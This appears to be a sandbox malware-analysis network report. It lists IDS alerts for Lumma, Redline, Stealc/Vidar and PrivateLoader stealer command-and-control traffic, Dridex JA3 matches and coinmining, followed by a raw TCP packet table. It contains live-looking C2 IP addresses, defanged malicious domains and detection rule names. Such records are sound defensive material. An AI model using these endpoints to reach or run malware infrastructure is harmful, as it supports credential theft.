2024-08-10T16:12:45.724728+0200	TCP	2054965	ET MALWARE Observed Lumma Stealer Related Domain (celebratioopz .shop in TLS SNI)	1	49759	443	192.168.2.4	104.21.47.141
2024-08-10T16:12:49.742237+0200	TCP	2054957	ET MALWARE Observed Lumma Stealer Related Domain (mennyudosirso .shop in TLS SNI)	1	49770	443	192.168.2.4	104.21.73.43
2024-08-10T16:12:52.444946+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49762	46967	192.168.2.4	45.9.91.71
2024-08-10T16:12:15.703309+0200	TCP	2826930	ETPRO COINMINER XMR CoinMiner Usage	2	49775	443	192.168.2.4	95.179.241.203
2024-08-10T16:13:08.669585+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49762	46967	192.168.2.4	45.9.91.71
2024-08-10T16:12:47.989074+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49764	443	192.168.2.4	104.21.69.39
2024-08-10T16:14:09.135938+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49823	443	192.168.2.4	188.114.96.3
2024-08-10T16:13:08.884788+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49762	46967	192.168.2.4	45.9.91.71
2024-08-10T16:13:09.402261+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49762	46967	192.168.2.4	45.9.91.71
2024-08-10T16:12:54.144101+0200	TCP	2054951	ET MALWARE Observed Lumma Stealer Related Domain (quialitsuzoxm .shop in TLS SNI)	1	49778	443	192.168.2.4	188.114.97.3
2024-08-10T16:13:13.648270+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49762	46967	192.168.2.4	45.9.91.71
2024-08-10T16:13:09.406151+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49794	443	192.168.2.4	78.46.239.218
2024-08-10T16:13:14.512964+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49762	46967	192.168.2.4	45.9.91.71
2024-08-10T16:12:44.846198+0200	UDP	2054964	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (celebratioopz .shop)	1	51062	53	192.168.2.4	1.1.1.1
2024-08-10T16:13:02.539567+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49789	443	192.168.2.4	78.46.239.218
2024-08-10T16:12:52.218808+0200	UDP	2036289	ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)	2	52991	53	192.168.2.4	1.1.1.1
2024-08-10T16:13:00.321544+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49785	443	192.168.2.4	78.46.239.218
2024-08-10T16:12:46.902113+0200	UDP	2054960	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (deallerospfosu .shop)	1	65137	53	192.168.2.4	1.1.1.1
2024-08-10T16:12:46.489067+0200	UDP	2054962	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (writerospzm .shop)	1	55940	53	192.168.2.4	1.1.1.1
2024-08-10T16:13:11.565090+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49797	443	192.168.2.4	78.46.239.218
2024-08-10T16:12:44.652440+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49758	443	192.168.2.4	104.21.76.141
2024-08-10T16:12:54.809665+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49762	46967	192.168.2.4	45.9.91.71
2024-08-10T16:13:03.696594+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49791	443	192.168.2.4	78.46.239.218
2024-08-10T16:13:06.097155+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49792	443	192.168.2.4	78.46.239.218
2024-08-10T16:12:50.563690+0200	UDP	2054954	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (languagedscie .shop)	1	57633	53	192.168.2.4	1.1.1.1
2024-08-10T16:12:53.431440+0200	UDP	2054950	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (quialitsuzoxm .shop)	1	55837	53	192.168.2.4	1.1.1.1
2024-08-10T16:12:55.932815+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49782	443	192.168.2.4	78.46.239.218
2024-08-10T16:12:55.155912+0200	TCP	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	443	49779	78.46.239.218	192.168.2.4
2024-08-10T16:13:18.409133+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49762	46967	192.168.2.4	45.9.91.71
2024-08-10T16:12:55.155832+0200	TCP	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	49779	443	192.168.2.4	78.46.239.218
2024-08-10T16:12:51.768755+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49772	443	192.168.2.4	188.114.97.3
2024-08-10T16:12:55.279836+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49762	46967	192.168.2.4	45.9.91.71
2024-08-10T16:13:08.456864+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49762	46967	192.168.2.4	45.9.91.71
2024-08-10T16:12:49.222422+0200	UDP	2054956	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (mennyudosirso .shop)	1	58154	53	192.168.2.4	1.1.1.1
2024-08-10T16:12:47.388221+0200	TCP	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	1	46967	49762	45.9.91.71	192.168.2.4
2024-08-10T16:12:59.691558+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49784	443	192.168.2.4	78.46.239.218
2024-08-10T16:13:03.219588+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49762	46967	192.168.2.4	45.9.91.71
2024-08-10T16:12:55.498932+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49762	46967	192.168.2.4	45.9.91.71
2024-08-10T16:13:07.855146+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49793	443	192.168.2.4	78.46.239.218
2024-08-10T16:13:17.292122+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49762	46967	192.168.2.4	45.9.91.71
2024-08-10T16:12:56.806357+0200	TCP	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	443	49782	78.46.239.218	192.168.2.4
2024-08-10T16:13:12.203272+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49762	46967	192.168.2.4	45.9.91.71
2024-08-10T16:12:57.525068+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49783	443	192.168.2.4	188.114.96.3
2024-08-10T16:12:50.190051+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49770	443	192.168.2.4	104.21.73.43
2024-08-10T16:12:49.195468+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49767	443	192.168.2.4	188.114.96.3
2024-08-10T16:12:52.995313+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49776	443	192.168.2.4	78.46.239.218
2024-08-10T16:12:54.503229+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49779	443	192.168.2.4	78.46.239.218
2024-08-10T16:12:48.695055+0200	TCP	2054959	ET MALWARE Observed Lumma Stealer Related Domain (bassizcellskz .shop in TLS SNI)	1	49767	443	192.168.2.4	188.114.96.3
2024-08-10T16:12:52.745110+0200	TCP	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	1	46967	49762	45.9.91.71	192.168.2.4
2024-08-10T16:13:11.877223+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49762	46967	192.168.2.4	45.9.91.71
2024-08-10T16:13:12.413570+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49762	46967	192.168.2.4	45.9.91.71
2024-08-10T16:12:20.689970+0200	TCP	2054711	ET MALWARE PrivateLoader CnC Activity (POST)	1	49732	80	192.168.2.4	185.225.200.214
2024-08-10T16:13:18.696605+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49762	46967	192.168.2.4	45.9.91.71
2024-08-10T16:12:19.359248+0200	TCP	2054710	ET MALWARE PrivateLoader CnC Response	1	80	49732	185.225.200.214	192.168.2.4
2024-08-10T16:13:14.594749+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49798	443	192.168.2.4	78.46.239.218
2024-08-10T16:12:46.221278+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49759	443	192.168.2.4	104.21.47.141
2024-08-10T16:12:14.958861+0200	TCP	2054709	ET MALWARE PrivateLoader CnC Activity (GET)	1	49732	80	192.168.2.4	185.225.200.214
2024-08-10T16:12:41.917157+0200	TCP	2054711	ET MALWARE PrivateLoader CnC Activity (POST)	1	49755	80	192.168.2.4	185.225.200.214
2024-08-10T16:12:46.900544+0200	TCP	2054963	ET MALWARE Observed Lumma Stealer Related Domain (writerospzm .shop in TLS SNI)	1	49763	443	192.168.2.4	104.21.16.74
2024-08-10T16:12:53.676087+0200	TCP	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	49776	443	192.168.2.4	78.46.239.218
2024-08-10T16:12:48.207236+0200	UDP	2054958	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (bassizcellskz .shop)	1	50847	53	192.168.2.4	1.1.1.1
2024-08-10T16:12:56.805945+0200	TCP	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	49782	443	192.168.2.4	78.46.239.218
2024-08-10T16:12:51.277332+0200	TCP	2054955	ET MALWARE Observed Lumma Stealer Related Domain (languagedscie .shop in TLS SNI)	1	49772	443	192.168.2.4	188.114.97.3
2024-08-10T16:13:18.093254+0200	TCP	2054495	ET MALWARE Vidar Stealer Form Exfil	1	49800	80	192.168.2.4	38.180.132.96
2024-08-10T16:13:16.125518+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49799	443	192.168.2.4	78.46.239.218
2024-08-10T16:12:55.057691+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49762	46967	192.168.2.4	45.9.91.71
2024-08-10T16:12:59.780017+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49762	46967	192.168.2.4	45.9.91.71
2024-08-10T16:13:17.297277+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49762	46967	192.168.2.4	45.9.91.71
2024-08-10T16:12:49.798203+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49769	443	192.168.2.4	78.46.239.218
2024-08-10T16:12:47.137434+0200	TCP	2046045	ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)	1	49762	46967	192.168.2.4	45.9.91.71
2024-08-10T16:12:51.569090+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49773	443	192.168.2.4	78.46.239.218
2024-08-10T16:12:47.533697+0200	TCP	2054961	ET MALWARE Observed Lumma Stealer Related Domain (deallerospfosu .shop in TLS SNI)	1	49764	443	192.168.2.4	104.21.69.39
2024-08-10T16:12:52.988072+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49774	443	192.168.2.4	104.21.14.101
2024-08-10T16:12:51.851157+0200	UDP	2054952	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (complaintsipzzx .shop)	1	65374	53	192.168.2.4	1.1.1.1
2024-08-10T16:13:16.959222+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49762	46967	192.168.2.4	45.9.91.71
2024-08-10T16:12:52.460611+0200	TCP	2054953	ET MALWARE Observed Lumma Stealer Related Domain (complaintsipzzx .shop in TLS SNI)	1	49774	443	192.168.2.4	104.21.14.101
2024-08-10T16:12:54.633726+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49778	443	192.168.2.4	188.114.97.3
2024-08-10T16:13:16.743314+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49762	46967	192.168.2.4	45.9.91.71
2024-08-10T16:13:01.399921+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49788	443	192.168.2.4	78.46.239.218

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 10, 2024 16:12:05.443331003 CEST	49675	443	192.168.2.4	173.222.162.32
Aug 10, 2024 16:12:06.234987020 CEST	49731	80	192.168.2.4	147.45.47.169
Aug 10, 2024 16:12:06.240185022 CEST	80	49731	147.45.47.169	192.168.2.4
Aug 10, 2024 16:12:06.240461111 CEST	49731	80	192.168.2.4	147.45.47.169
Aug 10, 2024 16:12:06.240593910 CEST	49731	80	192.168.2.4	147.45.47.169
Aug 10, 2024 16:12:06.245681047 CEST	80	49731	147.45.47.169	192.168.2.4
Aug 10, 2024 16:12:14.209789038 CEST	49731	80	192.168.2.4	147.45.47.169
Aug 10, 2024 16:12:14.243814945 CEST	49732	80	192.168.2.4	185.225.200.214
Aug 10, 2024 16:12:14.248888016 CEST	80	49732	185.225.200.214	192.168.2.4
Aug 10, 2024 16:12:14.248997927 CEST	49732	80	192.168.2.4	185.225.200.214
Aug 10, 2024 16:12:14.249187946 CEST	49732	80	192.168.2.4	185.225.200.214
Aug 10, 2024 16:12:14.254040956 CEST	80	49732	185.225.200.214	192.168.2.4
Aug 10, 2024 16:12:14.905175924 CEST	80	49732	185.225.200.214	192.168.2.4
Aug 10, 2024 16:12:14.934324026 CEST	49733	443	192.168.2.4	104.26.8.59
Aug 10, 2024 16:12:14.934406996 CEST	443	49733	104.26.8.59	192.168.2.4
Aug 10, 2024 16:12:14.934516907 CEST	49733	443	192.168.2.4	104.26.8.59
Aug 10, 2024 16:12:14.937072039 CEST	49733	443	192.168.2.4	104.26.8.59
Aug 10, 2024 16:12:14.937120914 CEST	443	49733	104.26.8.59	192.168.2.4
Aug 10, 2024 16:12:14.958861113 CEST	49732	80	192.168.2.4	185.225.200.214
Aug 10, 2024 16:12:15.419711113 CEST	443	49733	104.26.8.59	192.168.2.4
Aug 10, 2024 16:12:15.419971943 CEST	49733	443	192.168.2.4	104.26.8.59
Aug 10, 2024 16:12:15.424083948 CEST	49733	443	192.168.2.4	104.26.8.59
Aug 10, 2024 16:12:15.424134970 CEST	443	49733	104.26.8.59	192.168.2.4
Aug 10, 2024 16:12:15.424571991 CEST	443	49733	104.26.8.59	192.168.2.4
Aug 10, 2024 16:12:15.474648952 CEST	49733	443	192.168.2.4	104.26.8.59
Aug 10, 2024 16:12:15.702780008 CEST	49733	443	192.168.2.4	104.26.8.59
Aug 10, 2024 16:12:15.744527102 CEST	443	49733	104.26.8.59	192.168.2.4
Aug 10, 2024 16:12:15.845905066 CEST	443	49733	104.26.8.59	192.168.2.4
Aug 10, 2024 16:12:15.845999956 CEST	443	49733	104.26.8.59	192.168.2.4
Aug 10, 2024 16:12:15.846177101 CEST	49733	443	192.168.2.4	104.26.8.59
Aug 10, 2024 16:12:15.847395897 CEST	49733	443	192.168.2.4	104.26.8.59
Aug 10, 2024 16:12:15.847397089 CEST	49733	443	192.168.2.4	104.26.8.59
Aug 10, 2024 16:12:15.847460032 CEST	443	49733	104.26.8.59	192.168.2.4
Aug 10, 2024 16:12:15.847495079 CEST	443	49733	104.26.8.59	192.168.2.4
Aug 10, 2024 16:12:15.865791082 CEST	49734	443	192.168.2.4	34.117.59.81
Aug 10, 2024 16:12:15.865816116 CEST	443	49734	34.117.59.81	192.168.2.4
Aug 10, 2024 16:12:15.865885973 CEST	49734	443	192.168.2.4	34.117.59.81
Aug 10, 2024 16:12:15.866408110 CEST	49734	443	192.168.2.4	34.117.59.81
Aug 10, 2024 16:12:15.866417885 CEST	443	49734	34.117.59.81	192.168.2.4
Aug 10, 2024 16:12:16.348270893 CEST	443	49734	34.117.59.81	192.168.2.4
Aug 10, 2024 16:12:16.348391056 CEST	49734	443	192.168.2.4	34.117.59.81
Aug 10, 2024 16:12:16.351320982 CEST	49734	443	192.168.2.4	34.117.59.81
Aug 10, 2024 16:12:16.351334095 CEST	443	49734	34.117.59.81	192.168.2.4
Aug 10, 2024 16:12:16.351748943 CEST	443	49734	34.117.59.81	192.168.2.4
Aug 10, 2024 16:12:16.352644920 CEST	49734	443	192.168.2.4	34.117.59.81
Aug 10, 2024 16:12:16.400501013 CEST	443	49734	34.117.59.81	192.168.2.4
Aug 10, 2024 16:12:16.482599974 CEST	443	49734	34.117.59.81	192.168.2.4
Aug 10, 2024 16:12:16.482954025 CEST	443	49734	34.117.59.81	192.168.2.4
Aug 10, 2024 16:12:16.483042002 CEST	49734	443	192.168.2.4	34.117.59.81
Aug 10, 2024 16:12:16.483180046 CEST	49734	443	192.168.2.4	34.117.59.81
Aug 10, 2024 16:12:16.483191013 CEST	443	49734	34.117.59.81	192.168.2.4
Aug 10, 2024 16:12:16.483211040 CEST	49734	443	192.168.2.4	34.117.59.81
Aug 10, 2024 16:12:16.483217001 CEST	443	49734	34.117.59.81	192.168.2.4
Aug 10, 2024 16:12:19.352654934 CEST	49732	80	192.168.2.4	185.225.200.214
Aug 10, 2024 16:12:19.352788925 CEST	49732	80	192.168.2.4	185.225.200.214
Aug 10, 2024 16:12:19.359247923 CEST	80	49732	185.225.200.214	192.168.2.4
Aug 10, 2024 16:12:19.359466076 CEST	80	49732	185.225.200.214	192.168.2.4
Aug 10, 2024 16:12:20.106390953 CEST	49723	80	192.168.2.4	2.16.164.97
Aug 10, 2024 16:12:20.112397909 CEST	80	49723	2.16.164.97	192.168.2.4
Aug 10, 2024 16:12:20.112534046 CEST	49723	80	192.168.2.4	2.16.164.97
Aug 10, 2024 16:12:20.689623117 CEST	80	49732	185.225.200.214	192.168.2.4
Aug 10, 2024 16:12:20.689905882 CEST	80	49732	185.225.200.214	192.168.2.4
Aug 10, 2024 16:12:20.689970016 CEST	49732	80	192.168.2.4	185.225.200.214
Aug 10, 2024 16:12:20.780546904 CEST	80	49732	185.225.200.214	192.168.2.4
Aug 10, 2024 16:12:20.833846092 CEST	49732	80	192.168.2.4	185.225.200.214
Aug 10, 2024 16:12:20.960881948 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:20.961124897 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:20.961484909 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:20.962275982 CEST	49742	80	192.168.2.4	194.58.114.223
Aug 10, 2024 16:12:20.967485905 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:20.967562914 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:20.967652082 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:20.967691898 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:20.967710018 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:20.967845917 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:20.968508005 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:20.968576908 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:20.968672991 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:20.968866110 CEST	80	49742	194.58.114.223	192.168.2.4
Aug 10, 2024 16:12:20.968940973 CEST	49742	80	192.168.2.4	194.58.114.223
Aug 10, 2024 16:12:20.968980074 CEST	49742	80	192.168.2.4	194.58.114.223
Aug 10, 2024 16:12:20.972255945 CEST	49743	80	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:20.974292994 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:20.974443913 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:20.975548983 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:20.976027966 CEST	80	49742	194.58.114.223	192.168.2.4
Aug 10, 2024 16:12:20.979089975 CEST	80	49743	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:20.979235888 CEST	49743	80	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:20.979729891 CEST	49743	80	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:20.981791973 CEST	49744	80	192.168.2.4	162.0.209.124
Aug 10, 2024 16:12:20.986413956 CEST	80	49743	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:20.988461018 CEST	80	49744	162.0.209.124	192.168.2.4
Aug 10, 2024 16:12:20.988682985 CEST	49744	80	192.168.2.4	162.0.209.124
Aug 10, 2024 16:12:20.989203930 CEST	49744	80	192.168.2.4	162.0.209.124
Aug 10, 2024 16:12:20.996005058 CEST	80	49744	162.0.209.124	192.168.2.4
Aug 10, 2024 16:12:21.600341082 CEST	80	49744	162.0.209.124	192.168.2.4
Aug 10, 2024 16:12:21.600403070 CEST	49744	80	192.168.2.4	162.0.209.124
Aug 10, 2024 16:12:21.600464106 CEST	80	49744	162.0.209.124	192.168.2.4
Aug 10, 2024 16:12:21.600502014 CEST	49744	80	192.168.2.4	162.0.209.124
Aug 10, 2024 16:12:21.603589058 CEST	49744	80	192.168.2.4	162.0.209.124
Aug 10, 2024 16:12:21.604552031 CEST	49746	80	192.168.2.4	162.0.209.124
Aug 10, 2024 16:12:21.608436108 CEST	80	49744	162.0.209.124	192.168.2.4
Aug 10, 2024 16:12:21.609426975 CEST	80	49746	162.0.209.124	192.168.2.4
Aug 10, 2024 16:12:21.609591007 CEST	49746	80	192.168.2.4	162.0.209.124
Aug 10, 2024 16:12:21.612060070 CEST	49746	80	192.168.2.4	162.0.209.124
Aug 10, 2024 16:12:21.617309093 CEST	80	49746	162.0.209.124	192.168.2.4
Aug 10, 2024 16:12:21.617742062 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:21.617830038 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:21.618046045 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:21.621125937 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:21.621179104 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:21.621301889 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:21.622921944 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:21.626099110 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:21.648634911 CEST	80	49743	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:21.648857117 CEST	49743	80	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:21.649210930 CEST	80	49743	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:21.649363041 CEST	49743	80	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:21.654639006 CEST	80	49742	194.58.114.223	192.168.2.4
Aug 10, 2024 16:12:21.654812098 CEST	49742	80	192.168.2.4	194.58.114.223
Aug 10, 2024 16:12:21.655493975 CEST	49743	80	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:21.655759096 CEST	49747	80	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:21.660474062 CEST	80	49743	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:21.660561085 CEST	80	49747	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:21.660761118 CEST	49747	80	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:21.660814047 CEST	49747	80	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:21.665656090 CEST	80	49747	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:21.665827990 CEST	49748	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:21.665858984 CEST	443	49748	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:21.665914059 CEST	49748	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:21.666137934 CEST	49748	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:21.666151047 CEST	443	49748	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:21.711314917 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:21.711503029 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:21.711849928 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:21.716851950 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:21.806340933 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:21.806402922 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:21.806632042 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:21.811333895 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:21.811388016 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:21.811542988 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:21.811633110 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:21.816610098 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:21.954565048 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:21.954796076 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:21.955307961 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:21.955323935 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:21.955557108 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:21.957387924 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:21.957401991 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:21.957451105 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:21.957482100 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:21.960794926 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:21.960808992 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:21.960853100 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:21.960886002 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:21.964416981 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:21.964437008 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:21.964446068 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:21.964471102 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:21.964529991 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:21.967982054 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:21.967997074 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:21.968009949 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:21.968028069 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:21.968063116 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:21.970721960 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:21.970793962 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:21.996238947 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:21.996364117 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.000056028 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.004254103 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.004322052 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.004599094 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.005491018 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.012216091 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.100646973 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.100733042 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.101444006 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.101506948 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.101665974 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.101718903 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.103099108 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.103113890 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.103147984 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.103174925 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.106158018 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.106170893 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.106213093 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.109395027 CEST	80	49741	185.215.113.16	192.168.2.4
